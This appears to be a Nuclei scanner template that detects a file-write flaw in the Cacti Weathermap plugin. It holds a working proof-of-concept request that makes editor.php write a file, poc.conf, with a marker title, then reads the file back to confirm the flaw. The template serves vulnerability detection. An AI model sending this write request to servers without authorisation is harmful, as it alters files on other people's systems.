id: cacti-weathermap-file-write

info:
  name: Cacti Weathermap File Write
  author: pikpikcu
  severity: medium
  description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
  metadata:
    max-request: 2
  tags: injection,cacti

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"

  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/configs/poc.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e007bc546210a550061742fec465f5462c91d52c6e1bd59d4310a1fa9e5dbb3502202a97985ab447760c5a4ffb20ae2de531e0f9576a0c38c6b65fcc6ffbdde931f8:922c64590222798bb761d5b6d8e72950